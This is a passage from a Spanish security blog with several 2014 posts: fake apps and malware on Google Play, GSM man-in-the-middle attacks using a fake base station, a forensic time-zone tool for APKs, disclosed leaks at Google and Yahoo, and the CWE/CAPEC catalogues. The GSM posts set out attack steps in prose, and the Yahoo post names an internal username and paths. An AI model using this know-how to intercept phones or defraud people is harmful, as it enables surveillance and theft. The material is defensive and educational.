cuando se conectan. De estos hay tantos como malware en Windows, y cada uno con su forma particular de actuar, pero aprovechan especialmente las particularidades del sistema operativo. Afortunadamente, son los más difíciles de ver en Google Play, pero no por ello son "raros". Lo cierto es que parece una industria al alza, con avistamientos de malware sofisticado, con un funcionamiento (tanto técnico como logístico) muy parecido al malware bancario tradicional para Windows, como por ejemplo el reciente iBanking, cuyo código fuente se ha filtrado, pero se estaba vendiendo en entornos underground. Contaba con un panel de control web, al estilo del malware "tradicional" para Windows. Malware y aplicaciones "espía" Sin intentar imitar a nadie, son realmente sistemas de rastreo, espía, etc. Quizás orientados al control de menores. Pensadas para usuarios que deseen directamente espiar/troyanizar a alguien. No se ocultan, y dejan a criterio del usuario su utilidad. A veces Google Play las retira. Programas que "parecen" otros, pero no lo son realmente. Ejemplo de app que, aun usando la imagen original del juego, deja claro que se trata de una guía Intentan confundir al usuario. Su finalidad es conseguir descargas y lucrarse con la publicidad o realmente infectar al usuario a través de otros medios. Suelen ser oportunistas, esconderse bajo la coletilla de "wallpapers" sobre alguna actriz o película de moda, o bajo las palabras "guide", "hacks", "unlimited coins", "cheats".... como guías y trucos para pasar ciertas pantallas complejas de los juegos del momento. Mientras que las guías legítimas suelen dejar bien claro lo que son en la imagen y descripción de la app, otros no hacen distinción, invitan a la confusión e intentan infectar al usuario. Ejemplo de app que, usando de manera ilegítima la imagen del juego, añade "Tricks" al título para intentar pasar desapercibida Los atacantes que utilizan la coletilla de "tricks" en sus nombres, manteniendo la imagen original del juego (y por tanto confundiendo al usuario) consiguen permanecer en Google Play mucho más días y pasar más desapercibidos. Durante el tiempo que ha durado este estudio, hemos observado algunos programas falsos que, siendo simplemente adware, con estas coletillas en el título han conseguido sobrevivir semanas en el market. Otro ejemplo que añade "Free" al título para mantenerse más tiempo en el market Original a la izquierda, falso a la derecha. Este tipo de apps suelen durar mucho más tiempo en Google Play, por pasar más desapercibidas. A cambio, suelen tener menos descargas y por tanto, "éxito" Programa legítimo de pago y otro falso con el logotipo ligeramente modificado. Pocas descargas pero aún sigue disponible en Google Play Programas que parecen otros, lo son e incluso puede que funcionen como el resto, pero además incluyen adware Los atacantes reempaquetan el original al más puro estilo de los troyanos clásicos. Esto fue muy habitual hace pocos años y se generaron muchas alertas al respecto. Parece que ahora ocurre en menor medida después de que Google mejorara sus filtros. En algunos casos, la confusión es total sobre cuál es el juego "original". ¿Cuál es el Frozen Bubble "oficial"? Todos tienen pesos diferentes (desde 600k hasta 8 megas) y requieren distintos permisos, aunque dicen ser el... ¿mismo juego? Programas estafa Son los programas que buscan la estafa directamente, invitando al usuario a pagar por servicios por los que probablemente nunca pagaría conscientemente, o suscribiéndolos de forma poco clara a mensajes premium, incluso si necesitan confirmación. Ya son varias las muestras que se han encontrado en Google Play que eluden la confirmación a través de un PIN en un SMS, de forma que el propio programa lee el mensaje de confirmación y "responde" por el usuario. Así,queda suscrito de forma transparente (sin confirmación explícita) y se le comienza a cobrar por mensaje recibido. Este caso fue ampliamente discutido aquí, aunque Panda ya ha encontrado otros ejemplos similares. Estafa a través de aplicación que invita a pagar 5 euros por un enlace a la descarga oficial Dentro de este modelo, se pueden observar varios ejemplos centrados en España de los que hemos hablado en otras ocasiones. Aquí podríamos incluir las supuestas "bromas" que solo sirven para robar datos. Es ya un clásico la broma de las WiFis. Se trata de aplicaciones que dicen poder "adivinar" las claves de las WiFi alrededor del teléfono. Algunas de ellas, avisan de que son una simple broma. App que hace pensar que tiene unas funcionalidades, pero que solo avisa de que son mentira en su descripción Pero muchas otras, no. De lo que tampoco avisan, es de que pueden contener código como este en su interior: Código que envía información personal a un dominio, escondido en una aplicación supuestamente de broma Las aplicaciones que supuestamente avisan de que son una "broma" a modo de "disclaimer", pueden permanecer en Google Play indefinidamente, independientemente de que realicen este robo de datos en segundo plano . Programas que, en Google Play son presentados como réplicas casi exactas de otros Ejemplos muy logrados de apps falsas. El verdadero fabricante de Candy Crush y Pet Rescue es king.com, no King Mobile game Estos han sido muy comunes durante todo 2013. Excepto en el nombre del fabricante y el número de descargas, sería complicado reconocer si una aplicación es legítima o no. Se trata de apps que son simplemente adware, no contienen la funcionalidad del software original que intentan suplantar. Serían las "FakeApps" que hemos estudiado y de las que hemos recopilado un buen puñado de ejemplos. En todos, el fabricante es simulado, inventado, o deliberadamente remite a alguna parte del título del juego. Suelen pesar entre 200 y 400 kilobytes (frente a los varios megas de las apps originales que simulan) y solo constan del código necesario para que se ejecute el adware. Es importante destacar que en ocasiones, ni siquiera son cazados como malware por ningún motor antivirus. A veces incluso requieren menos permisos que las originales, o no contienen un sistema de profesionalización del malware. Basta con que no sean lo que prometen (no contengan en ningún momento la funcionalidad prometida) y supongan algún tipo de intrusión en el teléfono (con adware), como para que sean consideradas "fake". El primero es el original, el segundo el fake. La palabra "Internacional" en el título queda casi oculta En cualquier caso, resulta evidente la importancia del nombre y, sobre todo, la imagen. Más aún que la descripción, imágenes, o incluso descargas y reputación del fabricante. Un atacante que consigue mimetizar imagen y título de una app, tendrá muchas descargas rápidas garantizadas. Si la búsqueda se realiza desde un móvil, el desconcierto para el usuario y las posibilidades de que "pique" aumentan considerablemente, porque los elementos con los que cuenta el usuario para evaluar disminuyen, facilitando la estafa. En el ejemplo de la figura (donde se suplanta la imagen de BlackBerry Messenger), se muestra cómo la aplicación maliciosa puede llegar a aparecer antes incluso que la legítima en las búsquedas. El atacante aparece antes que la aplicación legítima en las búsquedas Este tipo de estafas ha sido muy común durante 2013 en Google Play, aunque parece que empieza a remitir el fenómeno. También, como último ejemplo, para el atacante es importante ser muy oportuno, en el sentido de estar al tanto de las últimas búsquedas y tendencias para practicar un buen SEO dentro de Google Play. Si es necesario, incluso pueden modificar nombre e icono de una aplicación cuando así lo requiere "el mercado" aun a riesgo de que no describa para nada la utilidad real. Solo para ganar descargas. Este es un buen ejemplo reciente. Aplicación de audio y vídeo a la que modificaron el nombre y el icono tras el "boom" mediático de Flappy Bird Continuaremos en la próxima entrega analizando qué aplicaciones suelen ser falseadas y más ejemplos. * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps * El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps? Sergio de los Santos ssantos@11paths.com @ssantosv
25 de febrero de 2014
MITM en GSM: ataque con falsa estación base (y II)
Puesto que la telefonía móvil 4G es ya una realidad, pudiera parecer que la tecnología GSM (2G) ha quedado relegada a un segundo plano. Pero no es así. Millones de suscriptores en el mundo siguen haciendo uso de esta tecnología cada día y la práctica totalidad de los terminales móviles 3G son compatibles con GSM. GSM es muy débil en cuestión de seguridad. ¿Cómo funcionaría un ataque con estación base falsa? Suplantando una BTS de un operador legítimo Un atacante necesita, para comenzar, información sobre su objetivo. En especial si se pretende realizar un ataque dirigido. En un escenario ideal para el atacante, debe poder identificar a la víctima con su operador de red y su IMSI. Este último parámetro se almacena en la SIM del usuario y en el registro de ubicación base (HLR) de la red, que es una base de datos que almacena información estática sobre los usuarios. Existen varias formas de obtener el IMSI de un suscriptor: Algunos servicios web ofrecen la posibilidad de consultar directamente los HLR de las operadoras, y en algunos casos obtener el IMSI de un determinado número. Otro método consiste en que sea el propio atacante el que utilice la BTS como IMSI-Catcher. Para conseguirlo, se debe acercar a la ubicación física del objetivo, y cuando las MS intenten registrarse contra la BTS falsa, indicarles que no es posible resolver su TMSI. Como el protocolo contempla que si esto ocurre, el teléfono envíe el IMSI, lo hará. El atacante puede rechazar el registro pero también almacenar el IMSI para así confeccionar una lista. Puesto que lo habitual es que se tengan muchas peticiones de otros usuarios que no sean la víctima concreta, deberá realizar esto mismo en diferente localizaciones donde sepa que se encuentra el objetivo... cruzar las listas y determinar el IMSI común. El atacante también debe obtener información que le permita caracterizar su estación base con parámetros reales de estaciones base legítimas. De esta forma, a ojos del móvil, su BTS será más creíble, y aumentarán las posibilidades de realizar el ataque con éxito. Para esto se suele monitorizar el espectro radioeléctrico, en busca de señales de beacon provenientes de BTS legítimas. Monitorización de los canales de señalización GSM con GNURadio, Airprobe y Wireshark. Fuente: rtl-sdr.com Para su configuración, los parámetros más importantes que se deben determinar mediante el análisis de estas señales son: La frecuencia a la que debe emitir la estación base falsa. Resulta un factor clave, porque se debe evitar interferir con un canal de la estación base de la célula en la que se encuentra el atacante y que, de esta forma, la presencia de la base pase inadvertida. Lo habitual es utilizar frecuencias de estaciones base de celdas adyacentes, lo que añadirá veracidad al ataque. La potencia de emisión es también otro factor determinante, puesto que a mayor potencia, mejor recepción de la señal del atacante en el dispositivo del usuario y por tanto más fácil será que se conecte a la BTS. Una vez configurada, se procede a emitir. Lo habitual es utilziar un inhibidor de frecuencia para saturar el espectro radioeléctrico en las frecuencias de la celda en la que se encuentran atacante y víctima, y de esta manera forzar al dispositivo de la víctima a registrarse en la BTS falsa. Otra manera es situarse lo suficientemente cerca para que la señal que reciba con más fuerza sea la falsa. De esta forma el móvil creerá que ha cambiado de celda y, si la BTS está correctamente caracterizada con la información que se ha obtenido anteriormente, se conectará. Cuando la víctima intente conectarse se debe aceptar el registro automáticamente, pudiendo incluso obviar el proceso de autenticación. Como ya mencionamos, la MS no tiene capacidad para decidir qué tipo de cifrado emplear en las comunicaciones sino que utiliza el que le imponga la red. Basta con pedirle que utilice A5/0 y las comunicaciones irán en texto plano. Para la víctima, todo este proceso es transparente. Estructura del ataque. Fuente: criptored.upm.es A partir de este momento el usuario está aislado de la red del operador en el sentido de que no podrá recibir comunicaciones entrantes. Si alguien intenta contactar con él, aparecerá como fuera de cobertura. Sin embargo, gracias a Asterisk el atacante podría redirigir llamadas salientes hacia la red. El atacante está en medio ¿y ahora qué? Una vez el atacante dispone del control de las comunicaciones del usuario, es posible hacer "de todo": escuchas, denegación de servicio, redirección de llamadas… Veamos un caso práctico, entre muchos otros posibles. Supongamos que el atacante quiere robar los datos bancarios de la víctima. Podría empezar por mandarle un SMS haciendo coincidir el número de origen con el de su entidad bancaria. Esto es tremendamente sencillo porque el servicio SMS no implementa comprobación del número de origen (de hecho, para este paso no hace falta ninguna infraestructura específica puesto que ya hay servicios web gratuitos que permiten esta funcionalidad). En el SMS se comunica a la víctima que, debido a una actualización de la base de datos, es necesario que contacte con su banco para proporcionar unos datos. Es posible que el usuario llame a la centralita de su entidad bancaria, pero la BTS falsa redirigirá la llamada a un teléfono controlado por el atacante. Como es la propia víctima quien realiza la llamada, es improbable que sospeche. El atacante, haciéndose pasar por un empleado del banco, podría solicitar su número de cuenta y clave de acceso. En general, GSM es una tecnología muy vulnerable. Todos sus elementos de seguridad están obsoletos y su arquitectura presenta importantes brechas de seguridad. Su uso es desaconsejable aunque sigue estando muy extendido. Quizás con la expansión de las redes 4G su popularidad vaya decayendo paulatinamente, pero es probable sea necesario mucho tiempo hasta que se convierta en marginal, puesto que, a su favor, tiene los poderosos motivos de compatibilidad. * MITM en GSM: ataque con falsa estación base (I) Cristóbal Bordiú cristobal.bordiu@11paths.com
19 de febrero de 2014
MITM en GSM: ataque con falsa estación base (I)
Puesto que la telefonía móvil 4G es ya una realidad, pudiera parecer que la tecnología GSM (2G) ha quedado relegada a un segundo plano. Pero no es así. Millones de suscriptores en el mundo siguen haciendo uso GSM cada día y la práctica totalidad de los terminales móviles 3G son compatibles con 2G. GSM es muy débil en cuestión de seguridad. ¿Cómo funcionaría un ataque con estación base falsa? Se puede suponer que una tecnología con semejante número de usuarios dispone de mecanismos que aseguran la seguridad de nuestras comunicaciones. Pero existe (y es más fácil de lo que parece) la posibilidad de que conversaciones o mensajes SMS acaben en manos de un tercero. Mapa mundial de frecuencias GSM. En azul, GSM 850/1900. En verde, GSM 900/1800. En rojo, sin cobertura GSM. Fuente: hardcorpstravel.com Realizar un ataque de hombre en el medio (MITM) en GSM es relativamente sencillo siempre y cuando se cuente con ciertos conocimientos técnicos concretos y presupuesto suficiente. A continuación veremos por qué se puede hacer, cómo se puede hacer y qué se podría conseguir. Para entender cómo funciona un ataque de estación base falsa es necesario familiarizarse con unas nociones básicas de la arquitectura GSM. Estructura jerárquica en GSM En GSM existen dos subsistemas bien diferenciados: por un lado tenemos el Network and Switching Subsystem (NSS), que representa el núcleo de la red y se encarga de realizar tareas de conmutación (MSC), gestión de movilidad y autenticación de usuarios (HLR y VLR, registros de ubicación local y visitante). Por otra parte está el Base Station Subsystem (BSS), que implementa el interfaz radioeléctrico GSM para la comunicación con los dispositivos de usuario (MS). Consta de dos elementos: Controlador de estaciones base (BSC): es el elemento de control que gestiona los recursos de una o varias estaciones base. Asigna frecuencias y regula potencias de emisión, además de controlar procedimientos internos como el paso de llamada. Estación base (BTS): es el dispositivo que da cobertura a las MS. Consta de una serie de antenas de emisión y transmisión, así como de moduladores y demás electrónica de comunicaciones. Cada BTS proporciona cobertura en un área determinada denominada célula o celda. Las estaciones base anuncian su presencia mediante el canal de beacon, de manera que las MS puedan localizarlas y registrarse en ellas. ¿Qué hace a GSM vulnerable? El estándar GSM presenta desde su concepción ciertos puntos débiles que le hacen especialmente vulnerable. Uno de ellos afecta al IMSI (identificador de suscriptor). El IMSI es una información considerada altamente confidencial, porque a partir de ella se puede inferir la localización geográfica de un usuario. El IMSI es un valor único que podría llegar a identificar a un usuario. Si quedara registrado en las torres en las que se suscribe el usuario, se podría literalmente "espiar" por dónde se mueve. Para solucionar este problema de privacidad, la norma establece que por defecto el IMSI no debe ser enviado por el interfaz radioeléctrico, y que en su lugar ha de utilizarse el TMSI (identificador temporal de suscriptor) al realizar actualizaciones de posición (registros en nuevos VLR). Aun así es posible recuperar el IMSI. Un VLR guarda una tabla de correspondencias IMSI-TMSI, pero si por algún motivo es incapaz de resolver un TMSI determinado, la red puede solicitar a la MS el envío de su IMSI en claro. Por otra parte, atendiendo a la confidencialidad de las comunicaciones, el estándar establece el A5/1 como algoritmo de cifrado por defecto. Pero también obliga a que todos los terminales GSM soporten A5/0 (transmisión sin cifrar). Además, la MS no tiene capacidad para decidir el método de cifrado, teniendo que aceptar el que le imponga la red. Sin embargo, el verdadero talón de Aquiles que encontramos en GSM es su protocolo de autenticación. A diferencia de las redes UMTS, donde ya vimos que la autenticación se realizaba en los dos sentidos, el estándar GSM sólo autentica al usuario frente a la red, mientras que la identidad de la red no se verifica. Esta carencia hace que sea relativamente fácil para un atacante suplantar a una estación base legítima y de esta manera interceptar y alterar las comunicaciones. Pero si se pretende suplantar una estación base, cabe plantearse por qué una MS (que ya está recibiendo servicio de una estación base legítima) se conectaría a la de un atacante. Existen varios eventos que pueden desencadenar un proceso de reselección de celda, y todos ellos pueden ser forzados por el atacante. Por ejemplo, con un inhibidor de frecuencias es posible provocar una pérdida de cobertura. Dos tipos de ataque Antes de profundizar en los pasos del ataque, debe quedar claro que existen dos tipos, en función de cómo se comporta el atacante respecto a la red. Por un lado está el ataque completo, en el que no solo se suplanta a la estación base sino que además se suplanta al usuario frente a la red. De esta manera la comunicación es totalmente bidireccional y el abanico de posibilidades de que disponemos se multiplica. El problema es que este tipo de ataque es muy complejo (sobre todo a la hora de sincronizar la señalización entre BTS, suplantador y víctima), y desde luego las herramientas necesarias no son tan fáciles de conseguir, Un ataque parcial, en el que solo se suplanta la estación base. En él, se restringe la comunicación un único sentido. En otras palabras, el usuario podrá realizar llamadas, pero no recibirlas. En esta entrada nos centraremos en este, mucho más sencillo. ¿Qué se necesita para suplantar a una estación base? Para acometer un ataque de esta naturaleza, el atacante (dando por sentado que posee conocimientos de informática y telecomunicaciones lo suficientemente extensos) necesita un conjunto de elementos hardware y software muy específicos ( en este libro , se entra en detalle sobre el funcionamiento y conocimiento necesarios) USRP N120. Fuente: Ettus.com Respecto a la parte hardware, el elemento principal es un dispositivo capaz de emitir en la banda de frecuencias de GSM (900 MHz y 1800 MHz en Europa), como por ejemplo alguno de la familia USRP de Ettus Research. El precio de estos aparatos oscila entre los mil y los tres mil euros (véase como ejemplo el N210). Además, son necesarias al menos dos antenas direccionales para la transmisión y recepción de datos, así como un modulador-demodulador de GMSK, que es la modulación empleada en GSM. En general, el hardware del atacante tendrá una potencia de transmisión y una capacidad de gestión muy inferior a las de una estación base real, lo que obligará a situarse en una zona próxima al objetivo. Con respecto al software, existe una gran variedad de herramientas de libre distribución que desempeña las funcionalidades de una estación base de GSM. Por un lado disponemos de OpenBTS (Open Base Transceiver Station), que hace las veces de punto de acceso software de GSM, implementando toda su pila de protocolos asociada. Y por otro lado tenemos Asterisk, que permite desarrollar las funciones de una central de conmutación. Por último, también será necesaria alguna herramienta que permita capturar el tráfico, como por ejemplo Airprobe. Con los elementos anteriores u otros equivalentes, es posible iniciar el ataque. * MITM en GSM: ataque con falsa estación base (y II) Cristóbal Bordiú cristobal.bordiu@11paths.com
12 de febrero de 2014
Nueva herramienta: GmtCheck. ¿De dónde viene esta app de Android o applet?
Existen millones de applets maliciosos (ficheros JAR) y apps de Android (ficheros APK) ahí fuera. ¿De dónde vienen? ¿De qué país? ¿Al menos, cuál es su zona horaria? En un estudio forense, puede ser relevante conocer (o al menos establecer indicios) si provienen de Rusia, Brasil, China, la India o Estados Unidos. Veamos cómo. Los ficheros dentro de los ZIP Los APK (apps de Android) y los applets (y programas Java) vienen todos del mismo formato: son un fichero ZIP. Esto quiere decir que comparten buena parte de las especificaciones PKzip. A la hora de crear un fichero ZIP, el atributo "fecha" de modificación de cada fichero se almacena dentro del ZIP. Se puede comprobar simplemente abriendo un fichero con cualquier herramienta. La forma en la que se almacena este dato es curiosa, y hablaremos de ella en alguna otra entrada. La parte interesante es que el atributo "fecha y hora de modificación" con el que se almacenan es el mismo que el del sistema en el que se han compilado. También, que hay ficheros que se crean justo cuando se compila el programa, como el manifiesto (.mf). Pero, no se da ningún "offset" a esa hora, así que este dato por sí mismo no permite saber si el APK o el JAR está creado en un país concreto. Un fichero dentro del ZIP con fecha de modificación a las 23:45 no significa nada por sí solo. ¿Las 23:45 de qué país? Fechas de modificación de los ficheros dentro de un APK Ficheros firmados y certificados Algunos applets se firman, de forma que pueden escapar de la sandbox de Java y atacar a los usuarios. Los APK casi siempre están firmados, porque Google Play y Android dicen que así debe ser para usarlo en su plataforma. Cuando están firmados, se añade un certificado dentro de los ficheros ZIP. Este certificado está en una estructura PKCS7, que es un fichero con extensión (entre otras) RSA o DSA en el directorio META-INF. Los certificados puede que estén autofirmados. Esto es gratis y los atacantes no tienen que demostrar a nadie quiénes son en realidad. Atacantes y certificados Fecha de creación del certificado... "Válido desde..." Los atacantes odian los certificados firmados por CAs, pero les encantan (y tienen que hacerlo) los certificados autofirmados. Son gratis y desechables. Pueden crear un certificado autofirmado ad-hoc para una app y nunca usarlo más. Eclipse y otras plataformas de desarrollo ayuda en esta tarea de crear expresamente certificados a la hora de compilar ficheros apk, como último paso antes de enviarlo a Google Play. Los certificados se almacenan dentro de los APK cuando se crean. Y aquí está el truco. Su hora de creación se almacena sin "zona horaria, o sea, en UTC. En concreto en formato YYMMDDHHMMSSZ. La Z corresponde a "hora zulú", que es UTC o a efectos prácticos,, casi igual que GMT+0. time zone. Vista en formato ASN.1 de la fecha de un certificado Como curiosidad, si un certificado contiene una fecha más allá de 2049, se usa un formato llamado "generalizado", que es fundamentalmente el mismo pero incluye la especificación completa del año con cuatro cifras. YYYYMMDDHHMMSSZ. Poniéndolo todo junto Así que por un lado tenemos la fecha de sistema del creador, y la hora UTC, que no es más que GMT+0. Solo tenemos que asumir que el certificado y los ficheros son creados justo en el mismo momento para hacer las cuentas y calcular el "offset" de la zona horaria. Si un fichero manifest o de firmas (que son los últimos creados en la compilación de un JAR o APK) contiene la fecha de sistema 16:00, 1 de enero de 2014, y la hora UTC del certificado pone que fue creado a las 15:00 del 1 de enero de 2014, si asumimos que se crearon en el mismo momento, podríamos decir (a menos que el atacante haya modificado su hora de sistema) que el atacante vive en una zona horaria GMT+1. Hora UTC - Ficheros ZIP... en su diferencia está el offset y, por tanto, la zona horaria (fuente del mapa: timeanddate.com) La herramienta que hace el cálculo Hemos creado una herramienta que realiza el cálculo. Lee un fichero JAR o APK y, si está firmado: Intentará extraer la hora de creación (UTC) de un certificado. Intentará leer la hora de modificación del último fichero creado en la compilación (normalmente el fichero .sf en el directorio meta-inf). Hará las cuentas y dirá en qué zona horaria vive el desarrollador, asumiendo que la creación del certificado y la compilación han ocurrido en el mismo momento (minuto arriba, minuto abajo) y que el desarrollador no ha modificado su hora de sistema. Estos son algunos ejemplos reales: Una app fraudulenta desde España Malware desde E.E.U.U Una aplicación falsa desde Hong Kong Este APK es de una aplicación india falsa. Teen Patti poker La herramienta está disponible en Python y compilada en C#. Ambas pueden ser descargadas desde este enlace: http://elevenpaths.com/downloads/gmtcheck.zip Invitamos al uso de la herramienta. Sergio de los Santos ssantos@11paths.com @ssantosv
10 de febrero de 2014
Fugas de información en Google y Yahoo! (encontradas con FaasT)
Hace unas semanas Manuel Fernández, desarrollador y auditor de seguridad en Eleven Paths, encontró unos archivos DS_Store en direcciones URL de Google mientras realizaba pruebas con FaasT. Google premió el descubrimiento, con una mención en su Hall of Fame. También hemos encontrado algunos ficheros con cierta información sensible en servidores de Yahoo!, pero ellos no han respondido a nuestro aviso. ¿Qué encontramos exactamente? y, sobre todo ¿era grave? Ya sabemos que cuando una empresa o un equipo de auditores realiza un test de intrusión , debe recopilar y atender a todos los detalles que se tienen al alcance, puesto que será la suma de todos esos datos los que pueden marcar la diferencia entre un test con un éxito moderado, o rotundo. Durante nuestras pruebas con FaasT (para comprobar si es capaz de aportar algo sobre páginas muy expuestas como google.com, Yahoo!, apple.com...) encontramos algunos datos relevantes. Google.es con ficheros DS_Store colgados en sus servidores y expuestos Gracias a FaasT, en los servidores del buscador encontramos ficheros .DS_Store expuestos por el servidor web. Un archivo DS_Store puede disponer de rutas internas del equipo del usuario que manipuló la web, fechas y nuevas URLs con las que se puede seguir realizando el test de intrusión. FaasT identifica este tipo de errores y lo refleja con detalle en su interfaz web. El modelo de pentesting persistente permitirá detectar, entre otras muchas cosas, estos errores de configuración que implican que el nivel de seguridad se rebaje, se retroalimente la auditoría y se abran nuevos caminos de forma que la suma de estos detalles marque el desarrollo de la auditoría, la enriquezca y complete. Cuando se detectó este detalle en Google, probamos el plugin de DS_Store contra las direcciones URL donde lo detectó y pudo obtener un listado interesante de recursos. En la imagen tendríamos un ejemplo de cómo FaasT visualiza los elementos que puede sacar de un DS_Store encontrado en una URL. En este caso, aplicados a nuestros dominio demofaast.elevenpaths.com y donde se encuentran nuevas rutas a imágenes que se encontraban en el interior del DS_Store. Ejemplo de cómo se visualizan la información interna de un ficheor DS_Store en FaasT En el análisis de los DS_Store colgados en Google se obtuvieron los siguientes tipos de elementos: Más de 40 rutas nuevas, que almacenaban datos sobre el GSA (Google Search Appliance) de Google donde se explica detalladamente cómo está montada la infraestructura, cómo se configura... además de otros datos como documentación de su API interna. Más de 30 documentos PDF aparentemente no públicos. Otros ficheros DS_Store. Otros recursos HTML. Una vez notificamos a Google, los eliminó rápidamente y nos puso en el Hall o Fame como reconocimiento a la pequeña labor al mejorar su seguridad. El caso Yahoo Este caso es mucho más simple. Encontramos ciertos ficheros de SVN con información muy interesante en ellos, dentro de un dominio relativo a la publicidad en Yahoo!. Esta es una captura de lo que podía verse en ambos dominios. Información sensible en tw.adspecs.yahoo.com Más información sensible en tw.adspecs.yahoo.com Fundamentalmente, fueron dos entradas. * http://tw.adspecs.yahoo.com/tc/adspec_ppt/tw_chi/.svn/entries * http://tw.adspecs.yahoo.com/tc/adspec_ppt/.svn/entries En ellos se encontraban enlaces a ficheros cuando menos curiosos, como http://tw.adspecs.yahoo.com/tc/adspec_ppt/tw_chi/SynAd.zip De la información encontrada, se podían obtener los siguientes datos (probablemente obsoletos, pero siempre interesantes de cara a una auditoría): usuario ssh de svn.corp.yahoo.com (martinso) usuario de svn: (martinso) un dominio interno: svn.corp.yahoo.com ruta interna: /yahoo/adtech/asia/apac/adspecs/tc/adspec_ppt/tw_chi Muchos días después de escribir a Yahoo, eliminaron el contenido. Nunca obtuvimos respuesta por su parte. Pablo González pablo.gonzalez@11paths.com
3 de febrero de 2014
Ocho siglas relacionadas con las vulnerabilidades (II): CWE y CAPEC
Uno de los factores críticos sobre el que gira el mundo de la seguridad es el estudio y control de vulnerabilidades. Para ello existen organizaciones encargadas de tratar temas relacionados a este aspecto, como es el caso de MITRE, FIRST e ICASI. Veremos qué estándares utilizan y cómo aprovecharlos para entender mejor los problemas de seguridad. Si en la entrada anterior se cubrieron los CVE, en esta se hará los CWE y CAPEC. CWE CWE (Common Weakness Enumeration) es una lista de tipos de debilidades de software dirigida a desarrolladores y profesionales de la seguridad. Fue creada al igual que CVE para unificar la descripción de las debilidades de seguridad de software en cuanto a arquitectura, diseño y código se refiere. Se puede ver como un catálogo de debilidades documentadas que se suelen cometer programando, y que podría derivar en vulnerabilidades. Es muy utilizada por distintas herramientas de seguridad encargadas de identificar estas debilidades y para promover la identificación de las vulnerabilidades, mitigación y su prevención. CWE satisface la necesidad que tienen las grandes empresas u organizaciones de conocer y tener catalogadas las distintas debilidades existentes. De esta forma pueden comprobar y asegurar sus productos frente a fallos de seguridad ya conocidos. De igual manera, los consumidores esperan que las soluciones compradas o contratadas estén correctamente protegidas frente a las debilidades conocidas, y así también utilizar este catálogo para analizar las posibles debilidades de soluciones adquiridas. Si se desarrolla con el ánimo de evitar las CWE en mente, se mitigan las posibilidades de que posteriormente se sufran vulnerabilidades. Esta lista nace como iniciativa del MITRE para hacer frente a la diversidad de pensamiento sobre este asunto por parte de tres sectores: el académico, el comercial y el gubernamental. La lista de CWE se ofrece en tres vistas: Una de tipo diccionario, que incluye las debilidades debidamente enumeradas. Una vista de árbol donde se clasifican las debilidades individuales. Una nueva vista de árbol que permite a un usuario ampliar el conocimiento y las relaciones de las debilidades individuales encontradas en la vista anterior. Cómo aprovechar la página del CWE En el campo "Search by ID" podemos realizar una búsqueda especifica de aquellas debilidades cuando se conoce el CWE-ID sobre el cual está registrado. En el enlace "Documents" se pueden encontrar todos los documentos públicos relacionados con CWE. En los enlaces a "CWSS" y "CWRAF" se pueden encontrar toda la información relevante a estas dos siglas que se explicaran en próximos entradas. En el enlace "Search the Site2 pueden realizarse búsquedas específicas de debilidades de software utilizando palabras clave que puede estar contenidas en el nombre o la descripción de las debilidades en caso de no conocer su CWE-ID. Con el enlace "NVD (National Vulnerability Database)" se puede ir directamente a la página web de la base de datos de vulnerabilidades del NIST, de la que también se hablará en una próxima entrada. Con los enlaces "Vulnerabilitties (CVE)" y "Attack Patterns (CAPEC)" puede consultarse las otras dos listas. Con los enlaces "Weakness Scoring System (CWSS)" y "Weakness Risk Analysis Framework (CWRAF)", al igual que los enlaces comentados en el punto anterior, mostrará toda la información acerca de estas dos siglas. La información almacenada por esta lista es clasificada para cada debilidad de la siguiente manera. En la que se observa que una debilidad suele tener unas consecuencias comunes documentadas, unos patrones de ataque, y una probabilidad concreta de que sea explotada. Toda esta información permite saber a qué se enfrenta un usuario cuando ante una debilidad en el código. En comparación con el catálogo de CVE, lógicamente esta lista contiene un numero considerablemente menor de registros. Mientras que en CVE existen unas 60.000 vulnerabilidades documentadas desde 1998 (ver gráfico), CWE almacena 714 debilidades conocidas. Número de CVEs por año. Fuente: http://www.inteco.es/blogs/post/Seguridad/BlogSeguridad/Articulo_y_comentarios/Ciberespionaje_criptografia La última versión actualizada del top 25 de las debilidades más peligrosas que podrían encontrarse en el software, fue publicada el 13 de septiembre de 2011. Las cinco primeras de esta lista, son: CWE-89: Improper Neutralization of Special Elements used in an SQL Command (SQL Injection) CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) CWE-120: Buffer Copy without Checking Size of Input (Classic Buffer Overflow) CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) CWE-306: Missing Authentication for Critical Function CAPEC CAPEC (Common Attack Pattern Enumeration and Classification) es un catálogo de patrones de ataque que se encarga de recolectar información sobre ellos, junto a un esquema de clasificación exhaustiva. Estos patrones de ataques no son más que las descripciones de los métodos comunes utilizados para la explotación de vulnerabilidades. Las entradas de esta conocida lista intentan dar a conocer la perspectiva del atacante y los métodos utilizados para explotar los sistemas. Se generan después de un análisis de los ejemplos de exploits específicos. Estos exploits son presentados como ejemplo de explotación de una vulnerabilidad, o incluso pueden ser propuestos para añadirse en esta lista en caso de no estar registrado. Al igual que los demás catálogos , CAPEC intenta ofrecer la información necesaria para ayudar a mejorar la seguridad en todo el ciclo de vida de desarrollo de software y también apoyar las necesidades de los desarrolladores. Muchas de las vulnerabilidades que se registran comparten patrones de ataques, por tanto, no suelen generarse entradas en esta lista tan comúnmente como en la de vulnerabilidades. CAPEC cuenta con unas 400 entradas (patrones) actualmente. Cómo aprovechar la página del CAPEC En el campo "Search by ID" podemos realizar una búsqueda especifica de un patrón de ataque si conocemos valor sobre el cual fue registrado en esta lista. En el enlace "Methods of Attack View" el diccionario ofrece una clasificación de los patrones de ataque según los métodos que estos implementen. En la siguiente imagen se puede observar cómo CAPEC clasifica estos ataques y ofrece una vista de directorio en los que se puede ir desplegando cada uno de ellos y observar los distintos patrones. Por cada patrón, se puede estudiar sus soluciones o mitigaciones comunes, los recursos necesarios, o las habilidades que son necesarias en el atacante para llevarlo a cabo. En el enlace "Submit Content" se pueden proponer nuevos patrones de ataques para ser registrados en esta lista. Las 